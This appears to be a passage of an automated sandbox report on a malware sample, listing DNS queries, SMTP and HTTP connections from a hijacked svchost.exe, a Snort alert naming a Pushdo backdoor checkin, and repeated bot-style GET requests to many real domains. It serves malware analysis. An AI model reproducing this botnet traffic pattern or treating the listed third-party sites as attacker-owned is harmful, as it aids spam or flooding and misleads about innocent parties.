                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.151.30.147 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.34.228.78 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: web-york.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.248.94.67 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sanfotek.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fr-dat.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.172.94.1 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.128.140.29 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: beafin.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: stopllc.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 159.89.244.183 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 38.111.255.201 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dzm.cz
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: oozkranj.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.11.56.48 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: arowines.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: rast.se
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hazmatt.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fifa-ews.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: aba.org.eg
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 47.91.167.60 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wanoa.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shiner.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.128.87 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.234.120 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.8.75 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 82.208.6.9 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.reglera.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kustnara.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: msl-lock.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: apcotex.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: scip.org.uk
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.usadig.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.214.171.193 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.169.149.78 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 183.90.232.24 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: epc.com.au
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.95.235 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: okashimo.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: slower.it
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.224.10.110 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.55.51 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: workplus.hu
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: awal.ws
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: c-drop.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: jnf.at
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.163.173 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: top1oil.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mjrcpas.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjcagent.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: at-shun.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kumaden.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: daytonir.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: iranytu.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.42.105.162 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: banvari.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.142.176.225 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccrsi.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: snf.it
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbaben.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.219.177.56 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: anduran.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sinwal.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: likangds.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.ftchat.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: h-et-l.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.64.150.164 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kursavto.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: rkengg.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.205.70.128 25Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: madjek.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wolffkran.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.4.16.43 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wnit.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ntc.edu.au
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: acraloc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: popbook.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: eos-i.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: revoldia.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: atb-lit.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: amele.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: uhsa.edu.ag
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: skgm.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pleszew.policja.gov.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: icd-host.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.219.88.107 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.212.145.129 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.56.33.8 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: burstner.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.154.163.204 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.205.242.146 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: xinhui.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 193.107.88.74 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: aluminox.es
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ie-roi.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mijash3.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.128.216 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: xult.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.protonmail.ch
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shanks.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.22.232.175 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 138.201.65.187 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.239.201.14 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vivastay.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 59.106.13.169 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.235.175 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-asset.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 193.70.68.254 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 77.72.4.226 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: plaske.ua
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: touchfam.ca
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 154.88.50.199 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.yumgiskor.kz
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: indonesiamedia.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: a-domani.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nettlinx.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: softizer.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: rokoron.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: k-nikko.com
                      Source: TrafficSnort IDS: 2016867 ET TROJAN Backdoor.Win32.Pushdo.s Checkin 192.168.2.5:49698 -> 80.93.82.33:80
                      Source: unknownDNS traffic detected: query: www.wkhk.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: koz1.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: atis-sk.ca replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: webband.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: www.udesign.biz replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: cvswl.org replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: amele.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: mail7.digitalwaves.co.nz replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: amba-tc.si replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: canmore.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: www.jroy.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: websy.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: awfraser.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: www.owsports.ca replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: avc.com.sa replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: 89gospel.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: anteph.org replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: www.ftchat.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: agitz.com.br replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: chzko.ru replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: polprime.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftchat.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: www.yumgiskor.kz replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ktenergo.ru replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: toundo.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: cpwpb.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: actmin.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: www.medisa.info replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: someikan.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: clysma.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: ludea.cz replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: www.koz1.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: www.holleman.us replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: grlawcc.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: haigh-me.com replaycode: Name error (3)
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: Joe Sandbox ViewIP Address: 104.26.7.17 104.26.7.17
                      Source: Joe Sandbox ViewIP Address: 217.69.139.150 217.69.139.150
                      Source: unknownNetwork traffic detected: DNS query count 444
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:62416 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:62418 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.5:62424 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.5:62415 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:62419 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.5:62414 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.5:62417 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:62413 version: TLS 1.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 4680
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 4680
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.comCookie: PHPSESSID=8dd73ce1a917b5d53ecdcb71ebb9bc82
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=e54cc20c1d7fdf3749e95c6556111923
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
